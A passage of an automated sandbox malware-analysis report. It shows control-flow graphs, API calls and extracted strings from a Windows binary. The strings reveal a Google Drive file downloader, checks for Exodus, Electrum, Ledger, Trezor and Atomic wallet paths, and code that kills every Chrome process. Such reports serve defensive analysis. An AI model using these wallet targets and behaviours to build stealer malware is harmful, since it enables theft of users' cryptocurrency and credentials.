7ff643f2647a-7ff643f2648c 5460->5473 5462->5458 5463->5436 5463->5462 5480 7ff643f2651b-7ff643f2652d 5465->5480 5481 7ff643f266e0-7ff643f266e3 InternetCloseHandle 5465->5481 5469 7ff643f2655c 5466->5469 5470 7ff643f2655f-7ff643f26571 call 7ff643f69edc 5466->5470 5469->5470 5485 7ff643f26577-7ff643f2657c 5470->5485 5486 7ff643f26671-7ff643f266a3 call 7ff643f444a0 5470->5486 5476 7ff643f266eb-7ff643f266f3 5472->5476 5477 7ff643f264a7-7ff643f264ac call 7ff643f62790 5473->5477 5478 7ff643f2648e-7ff643f264a1 5473->5478 5482 7ff643f26722-7ff643f2674a call 7ff643f62770 5476->5482 5483 7ff643f266f5-7ff643f26706 5476->5483 5477->5472 5478->5436 5478->5477 5487 7ff643f26548-7ff643f2654d call 7ff643f62790 5480->5487 5488 7ff643f2652f-7ff643f26542 5480->5488 5481->5472 5489 7ff643f26708-7ff643f2671b 5483->5489 5490 7ff643f2671d call 7ff643f62790 5483->5490 5485->5486 5492 7ff643f26582-7ff643f2659b InternetReadFile 5485->5492 5505 7ff643f266d7-7ff643f266da InternetCloseHandle 5486->5505 5506 7ff643f266a5-7ff643f266b7 5486->5506 5487->5481 5488->5436 5488->5487 5489->5490 5497 7ff643f2674b-7ff643f26750 call 7ff643f6cd30 5489->5497 5490->5482 5499 7ff643f265d7-7ff643f265db call 7ff643f68fe0 5492->5499 5500 7ff643f2659d 5492->5500 5497->5417 5512 7ff643f265e0-7ff643f265fd InternetCloseHandle * 2 5499->5512 5503 7ff643f265a0-7ff643f265a5 5500->5503 5503->5499 5508 7ff643f265a7-7ff643f265d5 call 7ff643f69c48 InternetReadFile 5503->5508 5505->5481 5510 7ff643f266b9-7ff643f266cc 5506->5510 5511 7ff643f266d2 call 7ff643f62790 5506->5511 5508->5499 5508->5503 5510->5436 5510->5511 5511->5505 5512->5417 5514 7ff643f26603-7ff643f26608 5512->5514 5516 7ff643f2660a 5514->5516 5517 7ff643f2660d-7ff643f26639 call 7ff643f460e0 5514->5517 5516->5517 5521 7ff643f2663b-7ff643f2664d 5517->5521 5522 7ff643f2666d-7ff643f2666f 5517->5522 5523 7ff643f26668 call 7ff643f62790 5521->5523 5524 7ff643f2664f-7ff643f26662 5521->5524 5522->5476 5523->5522 5524->5436 5524->5523
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle_invalid_parameter_noinfo_noreturn$FileOpenRead
                                                                                                                                                                                                                                                                                          • String ID: &export=download$*$DST: $Failed to open file for writing.$File downloaded successfully and saved as $FileDownloader$InternetOpen failed.$InternetOpenUrl failed.$URL: $https://drive.google.com/uc?id=
                                                                                                                                                                                                                                                                                          • API String ID: 1313048855-3858291459
                                                                                                                                                                                                                                                                                          • Opcode ID: 294f5fc85c2f0487906edd9b6b1f9d274cb8d59ae5dbbc5e0e372d52cfeca7c9
                                                                                                                                                                                                                                                                                          • Instruction ID: ff7a1283f45662d36e3f76f9a9c1b793b12e29940024b79acc9d843fe9fa6b4b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 294f5fc85c2f0487906edd9b6b1f9d274cb8d59ae5dbbc5e0e372d52cfeca7c9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DF1F362F1CB86C1FA40BB64E5467AD2361FB857A4F104231EA5CA7AD9DF7DE481A300

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • NetUserEnum.NETAPI32(?,?,?,?,?,00000000,?,00007FF643F293EA), ref: 00007FF643F28B31
                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF643F293EA), ref: 00007FF643F28B92
                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF643F293EA), ref: 00007FF643F28BE6
                                                                                                                                                                                                                                                                                          • NetApiBufferFree.NETAPI32(?,?,?,?,?,00000000,?,00007FF643F293EA), ref: 00007FF643F28C72
                                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F28CB9
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$BufferEnumFreeUser_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: Atomic$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Program Files\Trezor Suite$C:\ProgramData\%s\exodus$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor$exists$status
                                                                                                                                                                                                                                                                                          • API String ID: 3930398341-644159398
                                                                                                                                                                                                                                                                                          • Opcode ID: 7eb9e71283cd00da8b237cdaf3f54b70826188251e06d88bdb529acb721159e9
                                                                                                                                                                                                                                                                                          • Instruction ID: 037cfb2fc7d691744fa0e7e35538553a3fa2063aa3246ad9a4f7622bf17fd97e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7eb9e71283cd00da8b237cdaf3f54b70826188251e06d88bdb529acb721159e9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6519F32B09B81DAE750EF65E4812AD73A5FB48798F404235EE5DA7B98DF39D141D300

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 5930 7ff643f5e440-7ff643f5e480 5931 7ff643f5e482-7ff643f5e489 5930->5931 5932 7ff643f5e495-7ff643f5e49e 5930->5932 5931->5932 5933 7ff643f5e48b-7ff643f5e490 5931->5933 5934 7ff643f5e4ba-7ff643f5e4bc 5932->5934 5935 7ff643f5e4a0-7ff643f5e4a3 5932->5935 5938 7ff643f5e714-7ff643f5e73a call 7ff643f62770 5933->5938 5936 7ff643f5e712 5934->5936 5937 7ff643f5e4c2-7ff643f5e4c6 5934->5937 5935->5934 5939 7ff643f5e4a5-7ff643f5e4ad 5935->5939 5936->5938 5940 7ff643f5e59d-7ff643f5e5c4 call 7ff643f5e770 5937->5940 5941 7ff643f5e4cc-7ff643f5e4cf 5937->5941 5943 7ff643f5e4b3-7ff643f5e4b6 5939->5943 5944 7ff643f5e4af-7ff643f5e4b1 5939->5944 5953 7ff643f5e5e6-7ff643f5e5ef 5940->5953 5954 7ff643f5e5c6-7ff643f5e5cf 5940->5954 5945 7ff643f5e4e3-7ff643f5e4f5 GetFileAttributesExW 5941->5945 5946 7ff643f5e4d1-7ff643f5e4d9 5941->5946 5943->5934 5944->5934 5944->5943 5950 7ff643f5e4f7-7ff643f5e500 GetLastError 5945->5950 5951 7ff643f5e548-7ff643f5e557 5945->5951 5946->5945 5949 7ff643f5e4db-7ff643f5e4dd 5946->5949 5949->5940 5949->5945 5950->5938 5955 7ff643f5e506-7ff643f5e518 FindFirstFileW 5950->5955 5956 7ff643f5e55b-7ff643f5e55d 5951->5956 5959 7ff643f5e6a3-7ff643f5e6ac 5953->5959 5960 7ff643f5e5f5-7ff643f5e60d GetFileInformationByHandleEx 5953->5960 5957 7ff643f5e5df-7ff643f5e5e1 5954->5957 5958 7ff643f5e5d1-7ff643f5e5d9 CloseHandle 5954->5958 5961 7ff643f5e51a-7ff643f5e520 GetLastError 5955->5961 5962 7ff643f5e525-7ff643f5e546 FindClose 5955->5962 5963 7ff643f5e569-7ff643f5e597 5956->5963 5964 7ff643f5e55f-7ff643f5e567 5956->5964 5957->5938 5958->5957 5965 7ff643f5e755-7ff643f5e75a call 7ff643f71774 5958->5965 5966 7ff643f5e6fb-7ff643f5e6fd 5959->5966 5967 7ff643f5e6ae-7ff643f5e6c2 GetFileInformationByHandleEx 5959->5967 5968 7ff643f5e635-7ff643f5e64e 5960->5968 5969 7ff643f5e60f-7ff643f5e61b GetLastError 5960->5969 5961->5938 5962->5956 5963->5936 5963->5940 5964->5940 5964->5963 5987 7ff643f5e75b-7ff643f5e760 call 7ff643f71774 5965->5987 5975 7ff643f5e73b-7ff643f5e73f 5966->5975 5976 7ff643f5e6ff-7ff643f5e703 5966->5976 5971 7ff643f5e6e8-7ff643f5e6f8 5967->5971 5972 7ff643f5e6c4-7ff643f5e6d0 GetLastError 5967->5972 5968->5959 5977 7ff643f5e650-7ff643f5e654 5968->5977 5973 7ff643f5e61d-7ff643f5e628 CloseHandle 5969->5973 5974 7ff643f5e62e-7ff643f5e630 5969->5974 5971->5966 5972->5974 5979 7ff643f5e6d6-7ff643f5e6e1 CloseHandle 5972->5979 5973->5974 5980 7ff643f5e767-7ff643f5e76f call 7ff643f71774 5973->5980 5974->5938 5984 7ff643f5e74e-7ff643f5e753 5975->5984 5985 7ff643f5e741-7ff643f5e74c CloseHandle 5975->5985 5976->5936 5981 7ff643f5e705-7ff643f5e710 CloseHandle 5976->5981 5982 7ff643f5e69c 5977->5982 5983 7ff643f5e656-7ff643f5e670 GetFileInformationByHandleEx 5977->5983 5988 7ff643f5e6e3 5979->5988 5989 7ff643f5e761-7ff643f5e766 call 7ff643f71774 5979->5989 5981->5936 5981->5965 5986 7ff643f5e6a0 5982->5986 5991 7ff643f5e693-7ff643f5e69a 5983->5991 5992 7ff643f5e672-7ff643f5e67e GetLastError 5983->5992 5984->5938 5985->5965 5985->5984 5986->5959 5987->5989 5988->5974 5989->5980 5991->5986 5992->5974 5996 7ff643f5e680-7ff643f5e68b CloseHandle 5992->5996 5996->5987 5999 7ff643f5e691 5996->5999 5999->5974
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2398595512-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 084919010e652b5f85a0bab5836ad3d9afdd541a1c584fafeb2c470db68b38aa
                                                                                                                                                                                                                                                                                          • Instruction ID: e46b6bcbbf9c679e00df6d81cad024810fa00665a67fe4a102513ae9ee4e1b14
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 084919010e652b5f85a0bab5836ad3d9afdd541a1c584fafeb2c470db68b38aa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1919535B0DA0386E6E47F25B8066B92290AF657B0F148730D9BDE76E5DF3CE405A700

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 6000 7ff643f25d60-7ff643f25daf CreateToolhelp32Snapshot 6001 7ff643f25db1-7ff643f25de5 call 7ff643f444a0 6000->6001 6002 7ff643f25e20-7ff643f25e3a Process32FirstW 6000->6002 6009 7ff643f25de7-7ff643f25df9 6001->6009 6010 7ff643f25e19-7ff643f25e1b 6001->6010 6003 7ff643f25e40-7ff643f25e58 6002->6003 6004 7ff643f25fe4-7ff643f26009 CloseHandle call 7ff643f239d0 6002->6004 6008 7ff643f25e60-7ff643f25e7d 6003->6008 6016 7ff643f2600b-7ff643f26012 6004->6016 6017 7ff643f26014 6004->6017 6012 7ff643f25e80-7ff643f25e88 6008->6012 6013 7ff643f25dfb-7ff643f25e0e 6009->6013 6014 7ff643f25e14 call 7ff643f62790 6009->6014 6015 7ff643f2610a-7ff643f26139 call 7ff643f62770 6010->6015 6012->6012 6018 7ff643f25e8a-7ff643f25eb5 call 7ff643f44160 6012->6018 6013->6014 6019 7ff643f26180-7ff643f26185 call 7ff643f6cd30 6013->6019 6014->6010 6021 7ff643f2601e-7ff643f26030 call 7ff643f239d0 6016->6021 6017->6021 6030 7ff643f25eb7-7ff643f25ebf 6018->6030 6031 7ff643f25edb 6018->6031 6033 7ff643f2609f-7ff643f260b9 6021->6033 6034 7ff643f26032-7ff643f26046 6021->6034 6035 7ff643f25ec2-7ff643f25eca 6030->6035 6032 7ff643f25edd-7ff643f25ee1 6031->6032 6036 7ff643f25f18-7ff643f25f1a 6032->6036 6037 7ff643f25ee3-7ff643f25ef5 6032->6037 6038 7ff643f260bb-7ff643f260d6 call 7ff643f444a0 6033->6038 6039 7ff643f2613a-7ff643f26155 call 7ff643f444a0 6033->6039 6040 7ff643f26050-7ff643f26059 6034->6040 6035->6031 6041 7ff643f25ecc-7ff643f25ed3 6035->6041 6047 7ff643f25fce-7ff643f25fde Process32NextW 6036->6047 6048 7ff643f25f20-7ff643f25f36 OpenProcess 6036->6048 6044 7ff643f25ef7-7ff643f25f0a 6037->6044 6045 7ff643f25f10-7ff643f25f13 call 7ff643f62790 6037->6045 6059 7ff643f26106 6038->6059 6060 7ff643f260d8-7ff643f260ea 6038->6060 6058 7ff643f26157-7ff643f26169 6039->6058 6039->6059 6049 7ff643f2605b-7ff643f26060 6040->6049 6050 7ff643f26062-7ff643f26080 6040->6050 6041->6035 6042 7ff643f25ed5-7ff643f25ed9 6041->6042 6042->6032 6044->6019 6044->6045 6045->6036 6047->6004 6047->6008 6048->6047 6056 7ff643f25f3c-7ff643f25f5c 6048->6056 6052 7ff643f26084-7ff643f26090 Sleep call 7ff643f239d0 6049->6052 6051 7ff643f26082 6050->6051 6050->6052 6051->6052 6062 7ff643f26095-7ff643f2609d 6052->6062 6061 7ff643f25f60-7ff643f25f67 6056->6061 6063 7ff643f2616b-7ff643f2617e 6058->6063 6064 7ff643f26101 call 7ff643f62790 6058->6064 6059->6015 6060->6064 6065 7ff643f260ec-7ff643f260ff 6060->6065 6061->6061 6066 7ff643f25f69-7ff643f25f7c call 7ff643f444a0 6061->6066 6062->6033 6062->6040 6063->6019 6063->6064 6064->6059 6065->6019 6065->6064 6070 7ff643f25f7e-7ff643f25f90 6066->6070 6071 7ff643f25fb0-7ff643f25fc8 TerminateProcess CloseHandle 6066->6071 6072 7ff643f25fab call 7ff643f62790 6070->6072 6073 7ff643f25f92-7ff643f25fa5 6070->6073 6071->6047 6072->6071 6073->6019 6073->6072
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotTerminateToolhelp32_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: All Chrome instances closed.$Failed to create process snapshot.$No Chrome instances found or failed to close.$Terminating Chrome process with PID $chrome.exe
                                                                                                                                                                                                                                                                                          • API String ID: 2017165370-1079413332
                                                                                                                                                                                                                                                                                          • Opcode ID: c63639f6410e3f4b994faab32d566cb5ea5f152ba874f59cca8d5faf868ec6cc
                                                                                                                                                                                                                                                                                          • Instruction ID: e567ab08cc5e40bf4d3c7d807972a42efc77ded90566a56de3fe9d8ebd3c2f42
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c63639f6410e3f4b994faab32d566cb5ea5f152ba874f59cca8d5faf868ec6cc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CB14862B1C681C1EE50FB25E5022BA6361EF857B4F504331EAAD976E9DE7DE081A700

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 7182 7ff643f7d2c8-7ff643f7d303 call 7ff643f7c9c0 call 7ff643f7c9c8 call 7ff643f7ca30 7189 7ff643f7d52d-7ff643f7d579 call 7ff643f6cd60 call 7ff643f7c9c0 call 7ff643f7c9c8 call 7ff643f7ca30 7182->7189 7190 7ff643f7d309-7ff643f7d314 call 7ff643f7c9d0 7182->7190 7216 7ff643f7d6b7-7ff643f7d725 call 7ff643f6cd60 call 7ff643f8695c 7189->7216 7217 7ff643f7d57f-7ff643f7d58a call 7ff643f7c9d0 7189->7217 7190->7189 7195 7ff643f7d31a-7ff643f7d324 7190->7195 7197 7ff643f7d346-7ff643f7d34a 7195->7197 7198 7ff643f7d326-7ff643f7d329 7195->7198 7201 7ff643f7d34d-7ff643f7d355 7197->7201 7200 7ff643f7d32c-7ff643f7d337 7198->7200 7203 7ff643f7d339-7ff643f7d340 7200->7203 7204 7ff643f7d342-7ff643f7d344 7200->7204 7201->7201 7205 7ff643f7d357-7ff643f7d36a call 7ff643f7a168 7201->7205 7203->7200 7203->7204 7204->7197 7207 7ff643f7d373-7ff643f7d381 7204->7207 7213 7ff643f7d36c-7ff643f7d36e call 7ff643f78340 7205->7213 7214 7ff643f7d382-7ff643f7d38e call 7ff643f78340 7205->7214 7213->7207 7222 7ff643f7d395-7ff643f7d39d 7214->7222 7236 7ff643f7d727-7ff643f7d72e 7216->7236 7237 7ff643f7d733-7ff643f7d736 7216->7237 7217->7216 7226 7ff643f7d590-7ff643f7d59b call 7ff643f7ca00 7217->7226 7222->7222 7225 7ff643f7d39f-7ff643f7d3b0 call 7ff643f7fd10 7222->7225 7225->7189 7234 7ff643f7d3b6-7ff643f7d40c call 7ff643f899f0 * 4 call 7ff643f7d1e4 7225->7234 7226->7216 7235 7ff643f7d5a1-7ff643f7d5c4 call 7ff643f78340 GetTimeZoneInformation 7226->7235 7294 7ff643f7d40e-7ff643f7d412 7234->7294 7251 7ff643f7d68c-7ff643f7d6b6 call 7ff643f7c9b8 call 7ff643f7c9a8 call 7ff643f7c9b0 7235->7251 7252 7ff643f7d5ca-7ff643f7d5eb 7235->7252 7240 7ff643f7d7c3-7ff643f7d7c6 7236->7240 7241 7ff643f7d76d-7ff643f7d780 call 7ff643f7a168 7237->7241 7242 7ff643f7d738 7237->7242 7243 7ff643f7d7cc-7ff643f7d7d4 call 7ff643f7d2c8 7240->7243 7244 7ff643f7d73b 7240->7244 7256 7ff643f7d78b-7ff643f7d7a6 call 7ff643f8695c 7241->7256 7257 7ff643f7d782 7241->7257 7242->7244 7253 7ff643f7d740-7ff643f7d76c call 7ff643f78340 call 7ff643f62770 7243->7253 7244->7253 7254 7ff643f7d73b call 7ff643f7d544 7244->7254 7259 7ff643f7d5ed-7ff643f7d5f3 7252->7259 7260 7ff643f7d5f6-7ff643f7d5fd 7252->7260 7254->7253 7281 7ff643f7d7ad-7ff643f7d7bf call 7ff643f78340 7256->7281 7282 7ff643f7d7a8-7ff643f7d7ab 7256->7282 7264 7ff643f7d784-7ff643f7d789 call 7ff643f78340 7257->7264 7259->7260 7267 7ff643f7d611 7260->7267 7268 7ff643f7d5ff-7ff643f7d607 7260->7268 7264->7242 7274 7ff643f7d613-7ff643f7d687 call 7ff643f899f0 * 4 call 7ff643f71824 call 7ff643f7d7dc * 2 7267->7274 7268->7267 7275 7ff643f7d609-7ff643f7d60f 7268->7275 7274->7251 7275->7274 7281->7240 7282->7264 7296 7ff643f7d418-7ff643f7d41c 7294->7296 7297 7ff643f7d414 7294->7297 7296->7294 7299 7ff643f7d41e-7ff643f7d443 call 7ff643f86718 7296->7299 7297->7296 7305 7ff643f7d446-7ff643f7d44a 7299->7305 7307 7ff643f7d44c-7ff643f7d457 7305->7307 7308 7ff643f7d459-7ff643f7d45d 7305->7308 7307->7308 7310 7ff643f7d45f-7ff643f7d463 7307->7310 7308->7305 7312 7ff643f7d465-7ff643f7d48d call 7ff643f86718 7310->7312 7313 7ff643f7d4e4-7ff643f7d4e8 7310->7313 7323 7ff643f7d4ab-7ff643f7d4af 7312->7323 7324 7ff643f7d48f 7312->7324 7315 7ff643f7d4ea-7ff643f7d4ec 7313->7315 7316 7ff643f7d4ef-7ff643f7d4fc 7313->7316 7315->7316 7318 7ff643f7d517-7ff643f7d526 call 7ff643f7c9b8 call 7ff643f7c9a8 7316->7318 7319 7ff643f7d4fe-7ff643f7d514 call 7ff643f7d1e4 7316->7319 7318->7189 7319->7318 7323->7313 7327 7ff643f7d4b1-7ff643f7d4cf call 7ff643f86718 7323->7327 7325 7ff643f7d492-7ff643f7d499 7324->7325 7325->7323 7329 7ff643f7d49b-7ff643f7d4a9 7325->7329 7334 7ff643f7d4db-7ff643f7d4e2 7327->7334 7329->7323 7329->7325 7334->7313 7335 7ff643f7d4d1-7ff643f7d4d5 7334->7335 7335->7313 7336 7ff643f7d4d7 7335->7336 7336->7334
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF643F7D30D
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F7C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7C9E4
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F78340: RtlFreeHeap.NTDLL(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78356
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F78340: GetLastError.KERNEL32(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78360
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F6CD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF643F6CD0F,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F6CD69
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F6CD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF643F6CD0F,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F6CD8E
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F8695C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F868A7
                                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF643F7D2FC
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F7CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7CA44
                                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF643F7D572
                                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF643F7D583
                                                                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF643F7D594
                                                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF643F7D7D4), ref: 00007FF643F7D5BB
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                                          • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                                                          • Opcode ID: f6ffeae5673c8de371c0e9f3875728c18a8d6f78cbc9436f7dd89e17034f8244
                                                                                                                                                                                                                                                                                          • Instruction ID: 3fa83966b82d8de1679e306c3aca37efab9b1b415b2c5ff1565749fb766a4bbf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6ffeae5673c8de371c0e9f3875728c18a8d6f78cbc9436f7dd89e17034f8244
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75D1AE66A0C24286F7A4FF26D8525B96761EF84784F844136EE4DE7AC6EF3CE441E340

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
